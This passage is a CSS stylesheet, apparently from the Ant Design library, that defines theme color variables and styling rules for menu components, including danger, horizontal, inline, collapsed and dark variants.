--ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-menu-item-danger.ant-menu-item { color: var(--ant-error-color); } .ant-menu-item-danger.ant-menu-item:hover, .ant-menu-item-danger.ant-menu-item-active { color: var(--ant-error-color); } .ant-menu-item-danger.ant-menu-item:active { background: #fff1f0; } .ant-menu-item-danger.ant-menu-item-selected { color: var(--ant-error-color); } .ant-menu-item-danger.ant-menu-item-selected > a, .ant-menu-item-danger.ant-menu-item-selected > a:hover { color: var(--ant-error-color); } .ant-menu:not(.ant-menu-horizontal) .ant-menu-item-danger.ant-menu-item-selected { background-color: #fff1f0; } .ant-menu-inline .ant-menu-item-danger.ant-menu-item::after { border-right-color: var(--ant-error-color); } .ant-menu-dark .ant-menu-item-danger.ant-menu-item, .ant-menu-dark .ant-menu-item-danger.ant-menu-item:hover, .ant-menu-dark .ant-menu-item-danger.ant-menu-item > a { color: var(--ant-error-color); } .ant-menu-dark.ant-menu-dark:not(.ant-menu-horizontal) .ant-menu-item-danger.ant-menu-item-selected { color: #fff; background-color: var(--ant-error-color); } .ant-menu { box-sizing: border-box; margin: 0; padding: 0; font-variant: tabular-nums; line-height: 1.5715; font-feature-settings: 'tnum'; margin-bottom: 0; padding-left: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 0; text-align: left; list-style: none; background: #fff; outline: none; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); transition: background 0.3s, width 0.3s cubic-bezier(0.2, 0, 0, 1) 0s; } .ant-menu::before { display: table; content: ''; } .ant-menu::after { display: table; clear: both; content: ''; } .ant-menu.ant-menu-root:focus-visible { box-shadow: 0 0 0 2px var(--ant-primary-1); } .ant-menu ul, .ant-menu ol { margin: 0; padding: 0; list-style: none; } .ant-menu-overflow { display: flex; } .ant-menu-overflow-item { flex: none; } .ant-menu-hidden, .ant-menu-submenu-hidden { display: none; } .ant-menu-item-group-title { height: 1.5715; padding: 8px 16px; color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.5715; transition: all 0.3s; } .ant-menu-horizontal .ant-menu-submenu { transition: border-color 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), background 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-submenu, .ant-menu-submenu-inline { transition: border-color 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), background 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), padding 0.15s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-submenu-selected { color: var(--ant-primary-color); } .ant-menu-item:active, .ant-menu-submenu-title:active { background: var(--ant-primary-1); } .ant-menu-submenu .ant-menu-sub { cursor: initial; transition: background 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), padding 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-title-content { transition: color 0.3s; } .ant-menu-item a { color: rgba(0, 0, 0, 0.85); } .ant-menu-item a:hover { color: var(--ant-primary-color); } .ant-menu-item a::before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background-color: transparent; content: ''; } .ant-menu-item > .ant-badge a { color: rgba(0, 0, 0, 0.85); } .ant-menu-item > .ant-badge a:hover { color: var(--ant-primary-color); } .ant-menu-item-divider { overflow: hidden; line-height: 0; border-color: #f0f0f0; border-style: solid; border-width: 1px 0 0; } .ant-menu-item-divider-dashed { border-style: dashed; } .ant-menu-horizontal .ant-menu-item, .ant-menu-horizontal .ant-menu-submenu { margin-top: -1px; } .ant-menu-horizontal > .ant-menu-item:hover, .ant-menu-horizontal > .ant-menu-item-active, .ant-menu-horizontal > .ant-menu-submenu .ant-menu-submenu-title:hover { background-color: transparent; } .ant-menu-item-selected { color: var(--ant-primary-color); } .ant-menu-item-selected a, .ant-menu-item-selected a:hover { color: var(--ant-primary-color); } .ant-menu:not(.ant-menu-horizontal) .ant-menu-item-selected { background-color: var(--ant-primary-1); } .ant-menu-inline, .ant-menu-vertical, .ant-menu-vertical-left { border-right: 1px solid #f0f0f0; } .ant-menu-vertical-right { border-left: 1px solid #f0f0f0; } .ant-menu-vertical.ant-menu-sub, .ant-menu-vertical-left.ant-menu-sub, .ant-menu-vertical-right.ant-menu-sub { min-width: 160px; max-height: calc(100vh - 100px); padding: 0; overflow: hidden; border-right: 0; } .ant-menu-vertical.ant-menu-sub:not([class*='-active']), .ant-menu-vertical-left.ant-menu-sub:not([class*='-active']), .ant-menu-vertical-right.ant-menu-sub:not([class*='-active']) { overflow-x: hidden; overflow-y: auto; } .ant-menu-vertical.ant-menu-sub .ant-menu-item, .ant-menu-vertical-left.ant-menu-sub .ant-menu-item, .ant-menu-vertical-right.ant-menu-sub .ant-menu-item { left: 0; margin-left: 0; border-right: 0; } .ant-menu-vertical.ant-menu-sub .ant-menu-item::after, .ant-menu-vertical-left.ant-menu-sub .ant-menu-item::after, .ant-menu-vertical-right.ant-menu-sub .ant-menu-item::after { border-right: 0; } .ant-menu-vertical.ant-menu-sub > .ant-menu-item, .ant-menu-vertical-left.ant-menu-sub > .ant-menu-item, .ant-menu-vertical-right.ant-menu-sub > .ant-menu-item, .ant-menu-vertical.ant-menu-sub > .ant-menu-submenu, .ant-menu-vertical-left.ant-menu-sub > .ant-menu-submenu, .ant-menu-vertical-right.ant-menu-sub > .ant-menu-submenu { transform-origin: 0 0; } .ant-menu-horizontal.ant-menu-sub { min-width: 114px; } .ant-menu-horizontal .ant-menu-item, .ant-menu-horizontal .ant-menu-submenu-title { transition: border-color 0.3s, background 0.3s; } .ant-menu-item, .ant-menu-submenu-title { position: relative; display: block; margin: 0; padding: 0 20px; white-space: nowrap; cursor: pointer; transition: border-color 0.3s, background 0.3s, padding 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-item .ant-menu-item-icon, .ant-menu-submenu-title .ant-menu-item-icon, .ant-menu-item .anticon, .ant-menu-submenu-title .anticon { min-width: 14px; font-size: 14px; transition: font-size 0.15s cubic-bezier(0.215, 0.61, 0.355, 1), margin 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), color 0.3s; } .ant-menu-item .ant-menu-item-icon + span, .ant-menu-submenu-title .ant-menu-item-icon + span, .ant-menu-item .anticon + span, .ant-menu-submenu-title .anticon + span { margin-left: 10px; opacity: 1; transition: opacity 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), margin 0.3s, color 0.3s; } .ant-menu-item .ant-menu-item-icon.svg, .ant-menu-submenu-title .ant-menu-item-icon.svg { vertical-align: -0.125em; } .ant-menu-item.ant-menu-item-only-child > .anticon, .ant-menu-submenu-title.ant-menu-item-only-child > .anticon, .ant-menu-item.ant-menu-item-only-child > .ant-menu-item-icon, .ant-menu-submenu-title.ant-menu-item-only-child > .ant-menu-item-icon { margin-right: 0; } .ant-menu-item:focus-visible, .ant-menu-submenu-title:focus-visible { box-shadow: 0 0 0 2px var(--ant-primary-1); } .ant-menu > .ant-menu-item-divider { margin: 1px 0; padding: 0; } .ant-menu-submenu-popup { position: absolute; z-index: 1050; background: transparent; border-radius: 2px; box-shadow: none; transform-origin: 0 0; } .ant-menu-submenu-popup::before { position: absolute; top: -7px; right: 0; bottom: 0; left: 0; z-index: -1; width: 100%; height: 100%; opacity: 0.0001; content: ' '; } .ant-menu-submenu-placement-rightTop::before { top: 0; left: -7px; } .ant-menu-submenu > .ant-menu { background-color: #fff; border-radius: 2px; } .ant-menu-submenu > .ant-menu-submenu-title::after { transition: transform 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-submenu-popup > .ant-menu { background-color: #fff; } .ant-menu-submenu-expand-icon, .ant-menu-submenu-arrow { position: absolute; top: 50%; right: 16px; width: 10px; color: rgba(0, 0, 0, 0.85); transform: translateY(-50%); transition: transform 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-submenu-arrow::before, .ant-menu-submenu-arrow::after { position: absolute; width: 6px; height: 1.5px; background-color: currentColor; border-radius: 2px; transition: background 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), transform 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), top 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), color 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); content: ''; } .ant-menu-submenu-arrow::before { transform: rotate(45deg) translateY(-2.5px); } .ant-menu-submenu-arrow::after { transform: rotate(-45deg) translateY(2.5px); } .ant-menu-submenu:hover > .ant-menu-submenu-title > .ant-menu-submenu-expand-icon, .ant-menu-submenu:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow { color: var(--ant-primary-color); } .ant-menu-inline-collapsed .ant-menu-submenu-arrow::before, .ant-menu-submenu-inline .ant-menu-submenu-arrow::before { transform: rotate(-45deg) translateX(2.5px); } .ant-menu-inline-collapsed .ant-menu-submenu-arrow::after, .ant-menu-submenu-inline .ant-menu-submenu-arrow::after { transform: rotate(45deg) translateX(-2.5px); } .ant-menu-submenu-horizontal .ant-menu-submenu-arrow { display: none; } .ant-menu-submenu-open.ant-menu-submenu-inline > .ant-menu-submenu-title > .ant-menu-submenu-arrow { transform: translateY(-2px); } .ant-menu-submenu-open.ant-menu-submenu-inline > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after { transform: rotate(-45deg) translateX(-2.5px); } .ant-menu-submenu-open.ant-menu-submenu-inline > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before { transform: rotate(45deg) translateX(2.5px); } .ant-menu-vertical .ant-menu-submenu-selected, .ant-menu-vertical-left .ant-menu-submenu-selected, .ant-menu-vertical-right .ant-menu-submenu-selected { color: var(--ant-primary-color); } .ant-menu-horizontal { line-height: 46px; border: 0; border-bottom: 1px solid #f0f0f0; box-shadow: none; } .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu { margin-top: -1px; margin-bottom: 0; padding: 0 20px; } .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item:hover, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu:hover, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-active, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-active, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-open, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-open, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-selected, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-selected { color: var(--ant-primary-color); } .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item:hover::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu:hover::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-active::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-active::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-open::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-open::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-item-selected::after, .ant-menu-horizontal:not(.ant-menu-dark) > .ant-menu-submenu-selected::after { border-bottom: 2px solid var(--ant-primary-color); } .ant-menu-horizontal > .ant-menu-item, .ant-menu-horizontal > .ant-menu-submenu { position: relative; top: 1px; display: inline-block; vertical-align: bottom; } .ant-menu-horizontal > .ant-menu-item::after, .ant-menu-horizontal > .ant-menu-submenu::after { position: absolute; right: 20px; bottom: 0; left: 20px; border-bottom: 2px solid transparent; transition: border-color 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); content: ''; } .ant-menu-horizontal > .ant-menu-submenu > .ant-menu-submenu-title { padding: 0; } .ant-menu-horizontal > .ant-menu-item a { color: rgba(0, 0, 0, 0.85); } .ant-menu-horizontal > .ant-menu-item a:hover { color: var(--ant-primary-color); } .ant-menu-horizontal > .ant-menu-item a::before { bottom: -2px; } .ant-menu-horizontal > .ant-menu-item-selected a { color: var(--ant-primary-color); } .ant-menu-horizontal::after { display: block; clear: both; height: 0; content: '\20'; } .ant-menu-vertical .ant-menu-item, .ant-menu-vertical-left .ant-menu-item, .ant-menu-vertical-right .ant-menu-item, .ant-menu-inline .ant-menu-item { position: relative; } .ant-menu-vertical .ant-menu-item::after, .ant-menu-vertical-left .ant-menu-item::after, .ant-menu-vertical-right .ant-menu-item::after, .ant-menu-inline .ant-menu-item::after { position: absolute; top: 0; right: 0; bottom: 0; border-right: 3px solid var(--ant-primary-color); transform: scaleY(0.0001); opacity: 0; transition: transform 0.15s cubic-bezier(0.215, 0.61, 0.355, 1), opacity 0.15s cubic-bezier(0.215, 0.61, 0.355, 1); content: ''; } .ant-menu-vertical .ant-menu-item, .ant-menu-vertical-left .ant-menu-item, .ant-menu-vertical-right .ant-menu-item, .ant-menu-inline .ant-menu-item, .ant-menu-vertical .ant-menu-submenu-title, .ant-menu-vertical-left .ant-menu-submenu-title, .ant-menu-vertical-right .ant-menu-submenu-title, .ant-menu-inline .ant-menu-submenu-title { height: 40px; margin-top: 4px; margin-bottom: 4px; padding: 0 16px; overflow: hidden; line-height: 40px; text-overflow: ellipsis; } .ant-menu-vertical .ant-menu-submenu, .ant-menu-vertical-left .ant-menu-submenu, .ant-menu-vertical-right .ant-menu-submenu, .ant-menu-inline .ant-menu-submenu { padding-bottom: 0.02px; } .ant-menu-vertical .ant-menu-item:not(:last-child), .ant-menu-vertical-left .ant-menu-item:not(:last-child), .ant-menu-vertical-right .ant-menu-item:not(:last-child), .ant-menu-inline .ant-menu-item:not(:last-child) { margin-bottom: 8px; } .ant-menu-vertical > .ant-menu-item, .ant-menu-vertical-left > .ant-menu-item, .ant-menu-vertical-right > .ant-menu-item, .ant-menu-inline > .ant-menu-item, .ant-menu-vertical > .ant-menu-submenu > .ant-menu-submenu-title, .ant-menu-vertical-left > .ant-menu-submenu > .ant-menu-submenu-title, .ant-menu-vertical-right > .ant-menu-submenu > .ant-menu-submenu-title, .ant-menu-inline > .ant-menu-submenu > .ant-menu-submenu-title { height: 40px; line-height: 40px; } .ant-menu-vertical .ant-menu-item-group-list .ant-menu-submenu-title, .ant-menu-vertical .ant-menu-submenu-title { padding-right: 34px; } .ant-menu-inline { width: 100%; } .ant-menu-inline .ant-menu-selected::after, .ant-menu-inline .ant-menu-item-selected::after { transform: scaleY(1); opacity: 1; transition: transform 0.15s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.15s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-menu-inline .ant-menu-item, .ant-menu-inline .ant-menu-submenu-title { width: calc(100% + 1px); } .ant-menu-inline .ant-menu-item-group-list .ant-menu-submenu-title, .ant-menu-inline .ant-menu-submenu-title { padding-right: 34px; } .ant-menu-inline.ant-menu-root .ant-menu-item, .ant-menu-inline.ant-menu-root .ant-menu-submenu-title { display: flex; align-items: center; transition: border-color 0.3s, background 0.3s, padding 0.1s cubic-bezier(0.215, 0.61, 0.355, 1); } .ant-menu-inline.ant-menu-root .ant-menu-item > .ant-menu-title-content, .ant-menu-inline.ant-menu-root .ant-menu-submenu-title > .ant-menu-title-content { flex: auto; min-width: 0; overflow: hidden; text-overflow: ellipsis; } .ant-menu-inline.ant-menu-root .ant-menu-item > *, .ant-menu-inline.ant-menu-root .ant-menu-submenu-title > * { flex: none; } .ant-menu.ant-menu-inline-collapsed { width: 80px; } .ant-menu.ant-menu-inline-collapsed > .ant-menu-item, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title { left: 0; padding: 0 calc(50% - 16px / 2); text-overflow: clip; } .ant-menu.ant-menu-inline-collapsed > .ant-menu-item .ant-menu-submenu-arrow, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item .ant-menu-submenu-arrow, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-submenu-arrow { opacity: 0; } .ant-menu.ant-menu-inline-collapsed > .ant-menu-item .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item .anticon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item .anticon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title .anticon, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title .anticon { margin: 0; font-size: 16px; line-height: 40px; } .ant-menu.ant-menu-inline-collapsed > .ant-menu-item .ant-menu-item-icon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item .ant-menu-item-icon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-item-icon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title .ant-menu-item-icon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item .anticon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-item .anticon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-item-group > .ant-menu-item-group-list > .ant-menu-submenu > .ant-menu-submenu-title .anticon + span, .ant-menu.ant-menu-inline-collapsed > .ant-menu-submenu > .ant-menu-submenu-title .anticon + span { display: inline-block; opacity: 0; } .ant-menu.ant-menu-inline-collapsed .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed .anticon { display: inline-block; } .ant-menu.ant-menu-inline-collapsed-tooltip { pointer-events: none; } .ant-menu.ant-menu-inline-collapsed-tooltip .ant-menu-item-icon, .ant-menu.ant-menu-inline-collapsed-tooltip .anticon { display: none; } .ant-menu.ant-menu-inline-collapsed-tooltip a { color: rgba(255, 255, 255, 0.85); } .ant-menu.ant-menu-inline-collapsed .ant-menu-item-group-title { padding-right: 4px; padding-left: 4px; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-menu-item-group-list { margin: 0; padding: 0; } .ant-menu-item-group-list .ant-menu-item, .ant-menu-item-group-list .ant-menu-submenu-title { padding: 0 16px 0 28px; } .ant-menu-root.ant-menu-vertical, .ant-menu-root.ant-menu-vertical-left, .ant-menu-root.ant-menu-vertical-right, .ant-menu-root.ant-menu-inline { box-shadow: none; } .ant-menu-root.ant-menu-inline-collapsed .ant-menu-item > .ant-menu-inline-collapsed-noicon, .ant-menu-root.ant-menu-inline-collapsed .ant-menu-submenu .ant-menu-submenu-title > .ant-menu-inline-collapsed-noicon { font-size: 16px; text-align: center; } .ant-menu-sub.ant-menu-inline { padding: 0; background: #fafafa; border: 0; border-radius: 0; box-shadow: none; } .ant-menu-sub.ant-menu-inline > .ant-menu-item, .ant-menu-sub.ant-menu-inline > .ant-menu-submenu > .ant-menu-submenu-title { height: 40px; line-height: 40px; list-style-position: inside; list-style-type: disc; } .ant-menu-sub.ant-menu-inline .ant-menu-item-group-title { padding-left: 32px; } .ant-menu-item-disabled, .ant-menu-submenu-disabled { color: rgba(0, 0, 0, 0.25) !important; background: none; cursor: not-allowed; } .ant-menu-item-disabled::after, .ant-menu-submenu-disabled::after { border-color: transparent !important; } .ant-menu-item-disabled a, .ant-menu-submenu-disabled a { color: rgba(0, 0, 0, 0.25) !important; pointer-events: none; } .ant-menu-item-disabled > .ant-menu-submenu-title, .ant-menu-submenu-disabled > .ant-menu-submenu-title { color: rgba(0, 0, 0, 0.25) !important; cursor: not-allowed; } .ant-menu-item-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-submenu-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-item-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-submenu-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after { background: rgba(0, 0, 0, 0.25) !important; } .ant-layout-header .ant-menu { line-height: inherit; } .ant-menu-inline-collapsed-tooltip a, .ant-menu-inline-collapsed-tooltip a:hover { color: #fff; } .ant-menu-light .ant-menu-item:hover, .ant-menu-light .ant-menu-item-active, .ant-menu-light .ant-menu:not(.ant-menu-inline) .ant-menu-submenu-open, .ant-menu-light .ant-menu-submenu-active, .ant-menu-light .ant-menu-submenu-title:hover { color: var(--ant-primary-color); } .ant-menu.ant-menu-dark, .ant-menu-dark .ant-menu-sub, .ant-menu.ant-menu-dark .ant-menu-sub { color: rgba(255, 255, 255, 0.65); background: #001529; } .ant-menu.ant-menu-dark .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu.ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow { opacity: 0.45; transition: all 0.3s; } .ant-menu.ant-menu-dark .ant-menu-submenu-title .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow::after, .ant-menu.ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow::after, .ant-menu.ant-menu-dark .ant-menu-submenu-title .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow::before, .ant-menu.ant-menu-dark .ant-menu-sub .ant-menu-submenu-title .ant-menu-submenu-arrow::before { background: #fff; } .ant-menu-dark.ant-menu-submenu-popup { background: transparent; } .ant-menu-dark .ant-menu-inline.ant-menu-sub { background: #000c17; } .ant-menu-dark.ant-menu-horizontal { border-bottom: 0; } .ant-menu-dark.ant-menu-horizontal > .ant-menu-item, .ant-menu-dark.ant-menu-horizontal > .ant-menu-submenu { top: 0; margin-top: 0; padding: 0 20px; border-color: #001529; border-bottom: 0; } .ant-menu-dark.ant-menu-horizontal > .ant-menu-item:hover { background-color: var(--ant-primary-color); } .ant-menu-dark.ant-menu-horizontal > .ant-menu-item > a::before { bottom: 0; } .ant-menu-dark .ant-menu-item, .ant-menu-dark .ant-menu-item-group-title, .ant-menu-dark .ant-menu-item > a, .ant-menu-dark .ant-menu-item > span > a { color: rgba(255, 255, 255, 0.65); } .ant-menu-dark.ant-menu-inline, .ant-menu-dark.ant-menu-vertical, .ant-menu-dark.ant-menu-vertical-left, .ant-menu-dark.ant-menu-vertical-right { border-right: 0; } .ant-menu-dark.ant-menu-inline .ant-menu-item, .ant-menu-dark.ant-menu-vertical .ant-menu-item, .ant-menu-dark.ant-menu-vertical-left .ant-menu-item, .ant-menu-dark.ant-menu-vertical-right .ant-menu-item { left: 0; margin-left: 0; border-right: 0; } .ant-menu-dark.ant-menu-inline .ant-menu-item::after, .ant-menu-dark.ant-menu-vertical .ant-menu-item::after, .ant-menu-dark.ant-menu-vertical-left .ant-menu-item::after, .ant-menu-dark.ant-menu-vertical-right .ant-menu-item::after { border-right: 0; } .ant-menu-dark.ant-menu-inline .ant-menu-item, .ant-menu-dark.ant-menu-inline .ant-menu-submenu-title { width: 100%; } .ant-menu-dark .ant-menu-item:hover, .ant-menu-dark .ant-menu-item-active, .ant-menu-dark .ant-menu-submenu-active, .ant-menu-dark .ant-menu-submenu-open, .ant-menu-dark .ant-menu-submenu-selected, .ant-menu-dark .ant-menu-submenu-title:hover { color: #fff; background-color: transparent; } .ant-menu-dark .ant-menu-item:hover > a, .ant-menu-dark .ant-menu-item-active > a, .ant-menu-dark .ant-menu-submenu-active > a, .ant-menu-dark .ant-menu-submenu-open > a, .ant-menu-dark .ant-menu-submenu-selected > a, .ant-menu-dark .ant-menu-submenu-title:hover > a, .ant-menu-dark .ant-menu-item:hover > span > a, .ant-menu-dark .ant-menu-item-active > span > a, .ant-menu-dark .ant-menu-submenu-active > span > a, .ant-menu-dark .ant-menu-submenu-open > span > a, .ant-menu-dark .ant-menu-submenu-selected > span > a, .ant-menu-dark .ant-menu-submenu-title:hover > span > a { color: #fff; } .ant-menu-dark .ant-menu-item:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-item-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-submenu-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-submenu-open > .ant-menu-submenu-title > .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-submenu-selected > .ant-menu-submenu-title > .ant-menu-submenu-arrow, .ant-menu-dark .ant-menu-submenu-title:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow { opacity: 1; } .ant-menu-dark .ant-menu-item:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-item-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-submenu-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-submenu-open > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-submenu-selected > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-submenu-title:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-item:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-item-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-submenu-active > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-submenu-open > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-submenu-selected > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-submenu-title:hover > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before { background: #fff; } .ant-menu-dark .ant-menu-item:hover { background-color: transparent; } .ant-menu-dark.ant-menu-dark:not(.ant-menu-horizontal) .ant-menu-item-selected { background-color: var(--ant-primary-color); } .ant-menu-dark .ant-menu-item-selected { color: #fff; border-right: 0; } .ant-menu-dark .ant-menu-item-selected::after { border-right: 0; } .ant-menu-dark .ant-menu-item-selected > a, .ant-menu-dark .ant-menu-item-selected > span > a, .ant-menu-dark .ant-menu-item-selected > a:hover, .ant-menu-dark .ant-menu-item-selected > span > a:hover { color: #fff; } .ant-menu-dark .ant-menu-item-selected .ant-menu-item-icon, .ant-menu-dark .ant-menu-item-selected .anticon { color: #fff; } .ant-menu-dark .ant-menu-item-selected .ant-menu-item-icon + span, .ant-menu-dark .ant-menu-item-selected .anticon + span { color: #fff; } .ant-menu.ant-menu-dark .ant-menu-item-selected, .ant-menu-submenu-popup.ant-menu-dark .ant-menu-item-selected { background-color: var(--ant-primary-color); } .ant-menu-dark .ant-menu-item-disabled, .ant-menu-dark .ant-menu-submenu-disabled, .ant-menu-dark .ant-menu-item-disabled > a, .ant-menu-dark .ant-menu-submenu-disabled > a, .ant-menu-dark .ant-menu-item-disabled > span > a, .ant-menu-dark .ant-menu-submenu-disabled > span > a { color: rgba(255, 255, 255, 0.35) !important; opacity: 0.8; } .ant-menu-dark .ant-menu-item-disabled > .ant-menu-submenu-title, .ant-menu-dark .ant-menu-submenu-disabled > .ant-menu-submenu-title { color: 